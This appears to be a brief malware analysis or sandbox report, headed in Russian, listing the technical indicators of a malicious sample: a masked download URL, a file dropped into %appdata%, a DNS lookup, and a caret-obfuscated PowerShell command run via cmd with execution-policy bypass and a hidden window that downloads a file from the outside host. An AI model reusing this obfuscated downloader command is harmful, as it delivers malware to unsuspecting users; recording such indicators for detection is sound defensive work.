Техническая информация
- http://ra####-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ershEL^l.^e^X^e ^-ExE^CutioNpOl^iC^y ^b^yPAss ^-N^O^p^R^of^i^lE ^-w^I^ndOw^s^Tyle^ hiDdEN^ ^(N^ew-o^BJec^T ^SysT^em.nEt.WeBCl^I^eNt)^.d^OWNloA^DfIL^e('http://ra####-pandom....
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /C "POW^ershEL^l.^e^X^e ^-ExE^CutioNpOl^iC^y ^b^yPAss ^-N^O^p^R^of^i^lE ^-w^I^ndOw^s^Tyle^ hiDdEN^ ^(N^ew-o^BJec^T ^SysT^em.nEt.WeBCl^I^eNt)^.d^OWNloA^DfIL^e('http://ra####-pandom....' (со скрытым окном)